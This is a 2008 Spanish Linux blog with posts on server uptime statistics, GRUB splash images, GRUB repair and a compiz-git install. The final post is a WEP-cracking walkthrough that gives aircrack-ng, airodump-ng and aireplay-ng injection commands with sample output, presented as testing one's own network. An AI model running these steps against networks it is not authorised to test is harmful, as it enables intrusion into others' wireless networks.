sábado, 25 de octubre de 2008

Servidores Linux mejor desempeño que servidores microsoft

WatchMouse supervisó el rendimiento de más de 1500 sitios web europeos de distintos sectores económicos. Se comprobó que la mayoría de los sitios elegidos se basan en Linux o Windows y que Linux ofrece el mejor tiempo de actividad.

En lo que respecta a las plataformas de servidor web, la opinión generalizada se decide por Microsoft IIS y Apache, aunque este último rinde mejor que el primero. En el estudio ha quedado patente que, además del sistema operativo y de la plataforma de servidor web, el tiempo de actividad depende del país en que el servidor se encuentre.

Por lo general, Windows y Linux se ejecutan en más de tres cuartos de los sitios web. No obstante, existen diferencias entre países. Polonia y Alemania prefieren Linux en combinación con Apache para sus sitios web, mientras que los sitios profesionales en el Reino Unido y Suecia confían sobre todo en Windows y Microsoft IIS. Si se observa el rendimiento relativo de las distintas plataformas de servidor web, Linux desbanca con ventaja a Windows.

Uno de cada cuatro sitios web profesionales supervisados muestran un tiempo de actividad del 99,9%, lo que es suficiente para la satisfacción del cliente. Dos tercios de los sitios web muestran una disponibilidad por debajo del 99,9%, lo que supone un mínimo de 8 horas de tiempo de inactividad al año. En opinión de WatchMouse, esta cifra no es aceptable.

«Aunque las empresas incluidas en nuestro estudio parecen preferir Windows sobre Linux, nuestros resultados muestran que es preferible tener sitios web basados en Linux y Apache. El estudio ha demostrado que la mayoría de los usuarios son muy impacientes y no esperarán más de cuatro segundos a que se cargue una página», explica Mark Pors, jefe de tecnología de WatchMouse.

jueves, 23 de octubre de 2008

Como establecer imagen para el grub "Splash"


En un Grub hace falta una buena imagen de fondo por lo que te mostramos como establecer una imagen de fondo para tu Grub "Splash image"

debes editar tu archivo de configuracion de arranque menu.lst que se ubica en /boot/grub, pero antes de hacerlo crearemos una copia de seguridad del archivo

sudo -i
cd /boot/grub
cp menu.lst menu.lst_bak
nano menu.lst

al abrirse el archivo de configuracion menu.lst le agregamos.

#Splash Image!
splashimage=(hd0,0)/boot/grub/images/back.xpm.gz

debajo de las lineas

# Pretty colours
#color cyan/blue white/blue

donde (hd0,0) nos indica primer disco primera particiony la ubicacion de la imagen
si nuestra imagen esta en la segunda particion del tercer disco debe verse asi (hd2,1)/ubicaciondelarchivo.xpm.gz

el archivo debe ser extencion xpm y estar comprimido en gzip.

Como reparar el GRUB con un live cd

  1. Para recuperar el grub vamos al usar un LiveCD, que debe ser de una distro que use GRUB: Si ya tienes LiveCD de Ubuntu puede usar ese sin problemas.

  2. Suponiendo que ya tenemos LiveCD lo ponemos en el lector e iniciamos el PC desde ese dispositivo.

  3. Hacemos un directorio para montar nuestra partición con Linux:

    ~# mkdir /mnt/ubuntu /* puedes hacer el directorio que como te de la gana, mientras recuerdes cuál era.

  4. Montamos la partición con una orden de montaje convencional. En mi caso el formato de la partición es ext2, debé ser sustituirlo por el que se ajuste a nuestro caso, así como debe localizar la partición en la que tiene instalada Ubuntu (normalmente será algo como /dev/hda5, pero puede variar de un caso a otro).

    ~# mount -t ext2 partición_ubuntu /mnt/ubuntu

  5. Ahora vamos a cambiar el origen de root de nuestro sistema de archivos al directorio en el que hemos montado Ubuntu, para que al instalar grub interprete que el “/” del sistema está ahí. Para ello usamos chroot.

    ~# chroot /mnt/ubuntu/

  6. Instalamos GRUB en el MBR del primer disco duro, que normalmente estará configurado como Primary Master (hda).

    ~# grub-install /dev/hda

  7. Verificamos que todo está bien revisando las entradas que se han incluído en /boot/grub/menu.lst y si están todos nuestros sistemas (que será lo más normal) ya podemos reiniciar nuestro sistema, retirar el LiveCD y disfrutar de nuestro gestor de arranque.

martes, 21 de octubre de 2008

Descarga compiz-fusion GIT


Despues de ver este video seguro que vas a querer instalarte este plugin del Compiz-Fusion...
Una manera sencilla de hacerlo es con el script compiz-git se la siguiente forma.

Abre una terminal y escribe
sudo -i "obtenemos privilegios de administrador"
wget http://www.xs4all.nl/~mgj1/downloads/compiz-git-newest.tar.gz "descargamos el archivo"

tar xvfz compiz-git-newest.tar.gz
"descomprimimos"

cd compiz-git
"entramos al directorio"

./compiz-git install
"comenzamos proceso de instalacion"

Funciona a la perfeccion en Gutsy y Hardy

En caso de querer desinstalar

solo debes de entrar al directorio del script y hacer

sudo ./compiz-git uninstall
cd .. sudo rm -r compiz-git

mas informacion acerca de compiz-fusion y compiz-git

domingo, 19 de octubre de 2008

Como usar aircrack-ng

Con el aircrack-ng podemos probar que tan segura es nuestra red inalambrica intentando conseguir la contraseña de dicha red capturando y leyendo paquetes de su trafico. Aircrack puede desencriptar WEP, WPA, WPA2-PSK y cuenta con una numerosa cantidad de ataques y opciones para hacerlo.

Observaciones

- Debes descargar e instalar la suite aircrack-ng 1.0 (probado en esta)
www.aircrack-ng.org
- Tu adaptador inalambrico debe soportar modo monitor, la lista de dispositivos soportados esta en www.aircrack-ng.org

Pasos a seguir


- Abrir una terminal
- Adquirir privilegios de administrador escribiendo
$sudo -i

-ejecutar el comando iwconfig
#iwconfig
en la salida de este comando podremos ver el nombre de nuestra interface en mi caso esta es mi salida

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=0/70 Signal level=-94 dBm Noise level=-94 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Nos podemos dar cuenta que la interface es ath0 (tarjeta netgear con chipset atheros)

-Ejecutamos airmon-ng de la siguiente forma

#airmon-ng start wifi0
donde indicamos ejecutar airmon-ng "start" comenzar modo monitor "wifi0" interface, esto nos debe dar una salida como esta

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

este programa es parte de la suite aircrack-ng y será el encargado de habilitar el modo monitor en nuestra interface

donde podemos ver que se ha creado la interface ath1 que esta en modo monitor, podemos confirmar con un iwconfig

-Luego podemos ya comenzar la captura de paquetes con airodump-ng
utilizando la opcion --help tras airodump-ng podremos ver la ayuda y las opciones para el mismo

debemos ejecutar:
#airodump-ng ath1
y nos mostrara lo siguiente

CH 6 ][ Elapsed: 24 s ][ 2008-10-19 23:17

BSSID PWR Beacons #Data, #/s CH MB ENC CIP AUT ESSID

00:02:6F:4A:CC:BB 21 120 6 0 7 -1 WEP WEP mynetwork

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:4A:CC:BB 00:07:95:AC:AA:BB 46 0 -1 6 8

donde nos muestra el bssid essis datos canal encriptacion cifrado y autentificacion de la red inalambrica

pero estos datos no se estan guardando aun por lo que presionamos ctrl c para terminar el programa y especificamos al ejecutarlo que queremos guardar los datos capturados y filtrar el canal de la red de la siguiente forma -w seguido por el nombre del archivo a crear y -c para filtrar el canal de la red

en mi caso la red esta en el canal 7 por lo que escribimos

#airodump-ng -w capturas -c 7 ath1

y ya esta guardando las capturas en el archivo capturas.cap y solo nos muestras las redes del canal 7, si el trafico de esta red es muy bajo debes utilizar el aireplay-ng con sus debidas opciones para inyectar trafico a dicha red yo lo utilizo de la siguiente forma.

#aireplay-ng -1 0 -e mynetwork -a 00:02:6F:4A:CC:BB -b 00:02:6F:4A:CC:BB -h 01:07:6b:AA:CD:BB ath1
donde "aireplay-ng" ejecuta el programa "-1" indica el ataque que ene este caso es asociarse a la red "0" el tiempo "-e" el essid de la red "-a" el bssid del la red "-b" el bssid de la red y "ath1" la interface, de todo salir bien esto debe darnos una salida como esta

17:16:30 waiting for beacon frame (BSSID:00:02:6F:4A:CC:BB)
14:16:30 Sending Authentication Request
14:16:30 Authentication Successfull
14:16:30 Sending Association Request
14:16:30 Association successfull ;)
#

y aqui procedemos inyectar trafico en la red con la opcion "3", utilizamos la opcion "r" para leer el fichero que airodump esta creando y si deseamos controlar el numero de paquetes por segundo podemos agregar la opcion "x" seria algo silimar a esto

#aireplay-ng -3 -e mynetwork -a 00:02:6F:4A:CC:BB -b 00:02:6F:4A:CC:BB -h 01:07:6b:AA:CD:BB -r capturas.cap -x 200 ath1

"uso de la opcion -x" si no la utilizas automaticamente se usara por defecto la velocidad mas alta que permita tu procesador y tu adaptador wireless, si al inyectar sin la opcion -x el trafico capturado deja de aumentar preciona ctrl c en la terminal donde estas corriendo aireplay-ng y utiliza -x con una cantidad de pps mas pequeña (solo para computadoras no muy rapidas)

si todo marcha bien ya debemos ver los paquetes de capturas en aumento ahora solo queda esperar capturar 20,000 paquetes para hacer el primer ataque a nuestra WEP

al tener 20,000 paquetes capturados, ejecutamos aircrack-ng capturas.cap
luego de pasar unos segundos nos mostrara la clave encontrada, escribiendo solo aircrack-ng puedes ver las diferentes opciones y los diferentes ataques.
mucha suerte en tu prueba de seguridad para tu red,
cualquier duda o pregunta deja tu comentario.